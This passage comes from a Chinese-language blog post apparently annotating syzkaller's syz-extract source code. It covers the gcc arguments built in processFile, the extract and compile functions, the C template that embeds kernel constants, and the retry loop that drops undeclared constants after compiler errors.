class="comment">// Note: syz-sysgen also ignores this file for arm and riscv64.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>之后，生成<strong>编译代码模板</strong>所要用到的 gcc 编译参数：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function processFile of sys/syz-extract/linux.go</span></span><br><span class="line">headerArch := arch.target.KernelHeaderArch</span><br><span class="line">sourceDir := arch.sourceDir</span><br><span class="line">buildDir := arch.buildDir</span><br><span class="line">args := []<span class="type">string</span>&#123;</span><br><span class="line">    <span class="comment">// This makes the build completely hermetic, only kernel headers are used.</span></span><br><span class="line">    <span class="string">&quot;-nostdinc&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-w&quot;</span>, <span class="string">&quot;-fmessage-length=0&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-O3&quot;</span>, <span class="comment">// required to get expected values for some __builtin_constant_p</span></span><br><span class="line">    <span class="string">&quot;-I.&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-D__KERNEL__&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-DKBUILD_MODNAME=\&quot;-\&quot;&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/generated/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/generated&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/asm/mach-malta&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/asm/mach-generic&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/include&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/include&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/arch/&quot;</span> + headerArch + <span class="string">&quot;/include/generated/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/include/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/include/generated/uapi&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + sourceDir + <span class="string">&quot;/include/linux&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-I&quot;</span> + buildDir + <span class="string">&quot;/syzkaller&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-include&quot;</span>, sourceDir + <span class="string">&quot;/include/linux/kconfig.h&quot;</span>,</span><br><span class="line">&#125;</span><br><span class="line">args = <span class="built_in">append</span>(args, arch.target.CFlags...)</span><br><span class="line"><span class="keyword">for</span> _, incdir := <span class="keyword">range</span> info.Incdirs &#123;</span><br><span class="line">    args = <span class="built_in">append</span>(args, <span class="string">&quot;-I&quot;</span>+sourceDir+<span class="string">&quot;/&quot;</span>+incdir)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> arch.includeDirs != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    <span class="keyword">for</span> _, dir := <span class="keyword">range</span> strings.Split(arch.includeDirs, <span class="string">&quot;,&quot;</span>) &#123;</span><br><span class="line">        args = <span class="built_in">append</span>(args, <span class="string">&quot;-I&quot;</span>+dir)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>参数有亿点点多：</p><p><img src="/2022/03/syzkaller-1/image-20220309113521638.png" alt="image-20220309113521638"></p><p>在准备好参数之后，processFile 还准备了 extract 参数，以及待使用的 CC 编译器，之后执行<strong>更加核心的 extract 函数</strong>，生成出 res 映射和 undeclared 集合：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function processFile of sys/syz-extract/linux.go</span></span><br><span class="line">params := &amp;extractParams&#123;</span><br><span class="line">    AddSource:      <span class="string">&quot;#include &lt;asm/unistd.h&gt;&quot;</span>,</span><br><span class="line">    ExtractFromELF: <span class="literal">true</span>,</span><br><span class="line">    TargetEndian:   arch.target.HostEndian,</span><br><span class="line">&#125;</span><br><span class="line">cc := arch.target.CCompiler</span><br><span class="line">res, undeclared, err := extract(info, cc, args, params)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, err</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><img src="/2022/03/syzkaller-1/image-20220309113727970.png" alt="image-20220309113727970"></p><p>其中，res 是 <strong>const 字符串与整型</strong>的映射；undeclared 是<strong>未声明 const 字符串</strong>与 bool 值的映射，通常这里的 bool 值都为 true：</p><blockquote><p>undeclared 所对应的常量将在 <code>.const</code> 文件中标明其值为 <code>???</code></p><p>例如：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">O_RDWR = <span class="number">2</span></span><br><span class="line">MyConst = ???</span><br></pre></td></tr></table></figure></blockquote><p><img src="/2022/03/syzkaller-1/image-20220309132346585.png" alt="image-20220309132346585"></p><p>执行完成 extract 函数后，如果当前架构为 32 位，则 syz-extract 需要使用 mmap2 来替换 mmap，以避免一些可能的错误：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> arch.target.PtrSize == <span class="number">4</span> &#123;</span><br><span class="line">    <span class="comment">// mmap syscall on i386/arm is translated to old_mmap and has different signature.</span></span><br><span class="line">    <span class="comment">// As a workaround fix it up to mmap2, which has signature that we expect.</span></span><br><span class="line">    <span class="comment">// pkg/csource has the same hack.</span></span><br><span class="line">    <span class="keyword">const</span> mmap = <span class="string">&quot;__NR_mmap&quot;</span></span><br><span class="line">    <span class="keyword">const</span> mmap2 = <span class="string">&quot;__NR_mmap2&quot;</span></span><br><span class="line">    <span class="keyword">if</span> res[mmap] != <span class="number">0</span> || undeclared[mmap] &#123;</span><br><span class="line">        <span class="keyword">if</span> res[mmap2] == <span class="number">0</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;%v is missing&quot;</span>, mmap2)</span><br><span class="line">        &#125;</span><br><span class="line">        res[mmap] = res[mmap2]</span><br><span class="line">        <span class="built_in">delete</span>(undeclared, mmap)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>替换完成后将结果返回：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> res, undeclared, <span class="literal">nil</span></span><br></pre></td></tr></table></figure><p>以上内容便是 extractor.processFile 的源码解释，接下来我们深入一下 extract 函数。</p><h3 id="7-extract">7. extract</h3><blockquote><p>函数代码位于 sys/syz-extract/fetch.go</p></blockquote><p>该函数调用编译器来编译代码模板，并根据编译出的二进制文件来获取 consts 常量整数。若编译过程出错，则会尝试自动纠错。</p><p>函数声明：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">extract</span><span class="params">(info *compiler.ConstInfo, cc <span class="type">string</span>, args []<span class="type">string</span>, params *extractParams)</span></span> </span><br><span class="line">    <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>)</span><br></pre></td></tr></table></figure><p>其中参数 Info 便是单个文件存放 const 数据的结构体，cc 是编译器名称字符串，args 是编译器执行参数，params 是用于 extract 执行过程用的选项：</p><p><img src="/2022/03/syzkaller-1/image-20220309133255996.png" alt="image-20220309133255996"></p><p>初始时，extract 函数声明一系列的 map：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `extract`</span></span><br><span class="line">data := &amp;CompileData&#123;</span><br><span class="line">    extractParams: params,</span><br><span class="line">    Defines:       info.Defines,</span><br><span class="line">    Includes:      info.Includes,</span><br><span class="line">    Values:        info.Consts,</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 编译生成的程序路径</span></span><br><span class="line">bin := <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="comment">// 这个字段貌似没有用途，先行忽略</span></span><br><span class="line">missingIncludes := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>)</span><br><span class="line"><span class="comment">// 未定义的 const，通常是自己定义的常量</span></span><br><span class="line">undeclared := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>)</span><br><span class="line"><span class="comment">// 声明并初始化 valMap 中各个元素为 true</span></span><br><span class="line">valMap := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>)</span><br><span class="line"><span class="keyword">for</span> _, val := <span class="keyword">range</span> info.Consts &#123;</span><br><span class="line">    valMap[val] = <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>接下来便是尝试将 <strong>consts 常量字符串与模板C代码结合</strong>，并编译结合后的代码，形成一个可执行文件。编译操作由 <code>compile</code> 函数完成，其返回结果分别为编译出的可执行文件路径；编译器标准输出信息；编译器标准错误信息：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `extract`</span></span><br><span class="line"><span class="keyword">for</span> &#123;</span><br><span class="line">    bin1, out, err := compile(cc, args, data)</span><br><span class="line">    <span class="keyword">if</span> err == <span class="literal">nil</span> &#123;</span><br><span class="line">        bin = bin1</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>我们先深入进 compile 函数看看，该函数非常的简单，因此将笔记内联进代码中：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">compile</span><span class="params">(cc <span class="type">string</span>, args []<span class="type">string</span>, data *CompileData)</span></span> (<span class="type">string</span>, []<span class="type">byte</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    <span class="comment">// 创建填充好后的 C 代码缓冲区</span></span><br><span class="line">    src := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line">    <span class="comment">// 使用传入的 data 对代码模板 srcTemplate 进行填充</span></span><br><span class="line">    <span class="keyword">if</span> err := srcTemplate.Execute(src, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to generate source: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 创建一个临时可执行文件路径</span></span><br><span class="line">    binFile, err := osutil.TempFile(<span class="string">&quot;syz-extract-bin&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 为编译器添加额外的参数</span></span><br><span class="line">    args = <span class="built_in">append</span>(args, []<span class="type">string</span>&#123;</span><br><span class="line">        <span class="comment">// -x c ：指定代码语言为 C 语言</span></span><br><span class="line">        <span class="comment">// - ：指定代码从标准输入而不是从文件中读取</span></span><br><span class="line">        <span class="string">&quot;-x&quot;</span>, <span class="string">&quot;c&quot;</span>, <span class="string">&quot;-&quot;</span>,</span><br><span class="line">        <span class="comment">// 指定文件输出的路径</span></span><br><span class="line">        <span class="string">&quot;-o&quot;</span>, binFile,</span><br><span class="line">        <span class="string">&quot;-w&quot;</span>,</span><br><span class="line">    &#125;...)</span><br><span class="line">    <span class="keyword">if</span> data.ExtractFromELF &#123;</span><br><span class="line">        <span class="comment">// gcc -c 参数：只编译但不链接</span></span><br><span class="line">        <span class="comment">// 由于我们测试时使用的是 Linux，因此会进入该分支</span></span><br><span class="line">        args = <span class="built_in">append</span>(args, <span class="string">&quot;-c&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 执行程序</span></span><br><span class="line">    cmd := osutil.Command(cc, args...)</span><br><span class="line">    <span class="comment">// 将填充后的代码模板喂给 gcc 编译</span></span><br><span class="line">    cmd.Stdin = src</span><br><span class="line">    <span class="comment">// 将 stdin 和 stdout 的输入糅合，使得他俩的输出完全一致</span></span><br><span class="line">    <span class="comment">// 通俗的说就是让 stdin 和 stdout 都指向同一个管道</span></span><br><span class="line">    <span class="keyword">if</span> out, err := cmd.CombinedOutput(); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        os.Remove(binFile)</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, out, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> binFile, <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>执行至该函数入口时，其参数示例如下：</p><p><img src="/2022/03/syzkaller-1/image-20220309134856818.png" alt="image-20220309134856818"></p><p>现在我们看看是什么样的代码模板：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> srcTemplate = template.Must(template.New(<span class="string">&quot;&quot;</span>).Parse(<span class="string">`</span></span><br><span class="line"><span class="string">&#123;&#123;if not .ExtractFromELF&#125;&#125;</span></span><br><span class="line"><span class="string">#define __asm__(...)</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;if .DefineGlibcUse&#125;&#125;</span></span><br><span class="line"><span class="string">#ifndef __GLIBC_USE</span></span><br><span class="line"><span class="string">#    define __GLIBC_USE(X) 0</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;range $incl := $.Includes&#125;&#125;</span></span><br><span class="line"><span class="string">#include &lt;&#123;&#123;$incl&#125;&#125;&gt;</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;range $name, $val := $.Defines&#125;&#125;</span></span><br><span class="line"><span class="string">#ifndef &#123;&#123;$name&#125;&#125;</span></span><br><span class="line"><span class="string">#    define &#123;&#123;$name&#125;&#125; &#123;&#123;$val&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;.AddSource&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;if .DeclarePrintf&#125;&#125;</span></span><br><span class="line"><span class="string">int printf(const char *format, ...);</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;if .ExtractFromELF&#125;&#125;</span></span><br><span class="line"><span class="string">__attribute__((section(&quot;syz_extract_data&quot;)))</span></span><br><span class="line"><span class="string">unsigned long long vals[] = &#123;</span></span><br><span class="line"><span class="string">    &#123;&#123;range $val := $.Values&#125;&#125;(unsigned long long)&#123;&#123;$val&#125;&#125;,</span></span><br><span class="line"><span class="string">    &#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string">&#123;&#123;else&#125;&#125;</span></span><br><span class="line"><span class="string">int main() &#123;</span></span><br><span class="line"><span class="string">    int i;</span></span><br><span class="line"><span class="string">    unsigned long long vals[] = &#123;</span></span><br><span class="line"><span class="string">        &#123;&#123;range $val := $.Values&#125;&#125;(unsigned long long)&#123;&#123;$val&#125;&#125;,</span></span><br><span class="line"><span class="string">        &#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">    &#125;;</span></span><br><span class="line"><span class="string">    for (i = 0; i &lt; sizeof(vals)/sizeof(vals[0]); i++) &#123;</span></span><br><span class="line"><span class="string">        if (i != 0)</span></span><br><span class="line"><span class="string">            printf(&quot; &quot;);</span></span><br><span class="line"><span class="string">        printf(&quot;%llu&quot;, vals[i]);</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">    return 0;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">`</span>))</span><br></pre></td></tr></table></figure><p>可以很容易的看出来，该模板会将先前从 syzlang 收集到的 include、define 和 consts 字符串全部融合：</p><ul><li>如果设置了 ExtractFromELF 标志位，则 <strong>consts 值将全部放置在一个名为 syz_extract_data 的 section 上</strong></li><li>如果没有设置该标志位，则<strong>编译出来的程序在执行时将会依次打印 consts 值，以 <code>%llu</code> 的输出格式&amp;使用空格来区分每个变量，输出至 stdout</strong>中。这样，sys-extract 就可以通过分析所编译程序的输出，来确定每个 consts 字符串所对应的数值是多少。</li></ul><p>回到 <code>extract</code> 函数，由于编写 syzlang 时极易出问题，因此 syz-extract 需要尝试自动纠错：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `extract`</span></span><br><span class="line"><span class="keyword">for</span> &#123;</span><br><span class="line">    bin1, out, err := compile(cc, args, data)</span><br><span class="line">    <span class="keyword">if</span> err == <span class="literal">nil</span> &#123;</span><br><span class="line">        bin = bin1</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Some consts and syscall numbers are not defined on some archs.</span></span><br><span class="line">    <span class="comment">// Figure out from compiler output undefined consts,</span></span><br><span class="line">    <span class="comment">// and try to compile again without them.</span></span><br><span class="line">    <span class="comment">// May need to try multiple times because some severe errors terminate compilation.</span></span><br><span class="line">    tryAgain := <span class="literal">false</span></span><br><span class="line">    <span class="comment">// 遍历所有预先定义的错误信息，并使用正则表达式匹配</span></span><br><span class="line">    <span class="keyword">for</span> _, errMsg := <span class="keyword">range</span> []<span class="type">string</span>&#123;</span><br><span class="line">        <span class="string">`error: [‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;] undeclared`</span>,</span><br><span class="line">        <span class="string">`note: in expansion of macro [‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;]`</span>,</span><br><span class="line">        <span class="string">`note: expanded from macro [‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;]`</span>,</span><br><span class="line">        <span class="string">`error: use of undeclared identifier [‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;]`</span>,</span><br><span class="line">    &#125; &#123;</span><br><span class="line">        re := regexp.MustCompile(errMsg)</span><br><span class="line">        matches := re.FindAllSubmatch(out, <span class="number">-1</span>)</span><br><span class="line">        <span class="comment">// 如果匹配到了，则将出问题的常量取出至 undeclared 中</span></span><br><span class="line">        <span class="keyword">for</span> _, match := <span class="keyword">range</span> matches &#123;</span><br><span class="line">            val := <span class="type">string</span>(match[<span class="number">1</span>])</span><br><span class="line">            <span class="keyword">if</span> valMap[val] &amp;&amp; !undeclared[val] &#123;</span><br><span class="line">                undeclared[val] = <span class="literal">true</span></span><br><span class="line">                tryAgain = <span class="literal">true</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> !tryAgain &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to run compiler: %v %v\n%v\n%s&quot;</span>,</span><br><span class="line">                                    cc, args, err, out)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 重置编译用的 consts 数组</span></span><br><span class="line">    data.Values = <span class="literal">nil</span></span><br><span class="line">    <span class="comment">// 将出错的 consts 剔除，并将剩余没出错的 consts 存入编译用的 consts 数组</span></span><br><span class="line">    <span class="keyword">for</span> _, v := <span class="keyword">range</span> info.Consts &#123;</span><br><span class="line">        <span class="keyword">if</span> undeclared[v] &#123;</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        data.Values = <span class="built_in">append</span>(data.Values, v)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 这部分代码没咋看懂，因为 data.Includes 没有被重置，没必要重复添加</span></span><br><span class="line">    data.Includes = <span class="literal">nil</span></span><br><span class="line">    <span class="keyword">for</span> _, v := <span class="keyword">range</span> info.Includes &#123;</span><br><span class="line">        <span class="comment">// missingIncludes 没有初始化，因此是个一直为空的变量</span></span><br><span class="line">        <span class="keyword">if</span> missingIncludes[v] &#123;</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        data.Includes = <span class="built_in">append</span>(data.Includes, v)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>之后便是从编译出的二进制文件中读取数值，解析并返回：</p><blockquote><p>注意：虽然 syz-extract <strong>立即</strong>对编译出的二进制文件执行 remove 操作，但由于 syz-extract <strong>仍然持有该文件的文件描述符</strong>，因此该文件将<strong>不会立即被删除</strong>，而是等到 syz-extract 释放了该文件的文件描述符后才会被删除。</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 将新编译出的二进制文件删除</span></span><br><span class="line"><span class="keyword">defer</span> os.Remove(bin)</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> flagVals []<span class="type">uint64</span></span><br><span class="line"><span class="keyword">var</span> err <span class="type">error</span></span><br><span class="line"><span class="keyword">if</span> data.ExtractFromELF &#123;</span><br><span class="line">    flagVals, err = extractFromELF(bin, params.TargetEndian)</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    flagVals, err = extractFromExecutable(bin)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, err</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(flagVals) != <span class="built_in">len</span>(data.Values) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;fetched wrong number of values %v, want != %v&quot;</span>,</span><br><span class="line">                                <span class="built_in">len</span>(flagVals), <span class="built_in">len</span>(data.Values))</span><br><span class="line">&#125;</span><br><span class="line">res := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>)</span><br><span class="line"><span class="keyword">for</span> i, name := <span class="keyword">range</span> data.Values &#123;</span><br><span class="line">    res[name] = flagVals[i]</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> res, undeclared, <span 